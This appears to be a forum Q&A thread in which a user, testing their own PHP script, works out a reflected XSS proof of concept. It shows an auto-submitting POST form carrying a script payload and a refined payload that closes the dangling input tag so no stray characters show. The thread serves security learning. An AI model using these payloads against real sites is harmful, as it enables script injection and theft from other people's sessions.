Reputation: 392
XSS PoC: Hide Rendered Characters in DOM
I've started playing with XSS to better improve my security posture at work. I've been able to successfully exploit a reflected XSS attack using a redirected POST form, but I can't seem to remove the extraneous characters displayed on the page.
I've checked:
How to load javascript on another webpage through XSS?
But none of the suggestions seem to work for me.
My exploit is a basic form, exploiting a PHP server side script I've configured echoing $_POST['username'] into the value attribute:
<form id=1 method="post" action="http://vulnerable.site.com">
<input type="hidden" name="username"
value=""><script>alert('Hello');</script>"">
</form>
<script>
document.getElementById(1).submit();
</script>
Unencoded:
<form id=1 method="post" action="http://vulnerable.site.com">
<input type="hidden" name="username"
value=""><script>alert('Hello');</script>">
</form>
<script>
document.getElementById(1).submit();
</script>
But this pesky "> will not die:
I've tried:
- Several filter evasion techniques by adding additional characters recommended by OWASP
- Escaping the
">to">- this results in syntax errors, and removing the leading quotes breaks the payload. BUT, based on resources linked above, it seems possible based on comments - Using CSS selectors to hide the characters in my attack payload (using dev tools, the
">shows up as#textso I thought this might work)
I'm sure it's something silly, but what am I missing? It's clearly possible, but I'm not a skilled web developer (hence the fiddling around). Any feedback or advice would be appreciated!
Upvotes: 0
Views: 558
Answers (1)
Reputation: 392
I eventually figured it out after hours of trial and error. The idea is to close the dangling tag with a separate tag:
So the previous payload was:
"><script>alert('Hello');</script>
Which, after the PHP script parses it, looks like this:
<input type="text" name="username" value="">"> <!-- notice the dangling tag -->
After adding a closing input tag, the solution worked:
"><script>alert('Hello');</script><input type="hidden" value="
And output from PHP parsing:
<input type="text" name="username" value=""><script>alert('Hello');</script><input type="hidden" value="">
Note that the above needs to be HTML encoded to work properly. I omitted it for readability.
Upvotes: 0
Related Questions
- How to prevent Client DOM XSS vulnerability in javascript?
- Bypass HTML Encoding/Escaping for XSS
- Prevent XSS attacks when echoing HTML using PHP
- "invisible" data HTML tag
- how to prevent XSS in javascript string
- Hide html DOM data to end user
- Prevent XSS on client-side (Pure Javascript)
- How to output HTML but prevent XSS attacks
- How to prevent html or javascript injection with server-side php
- Remove XSS attacks while still allowing html?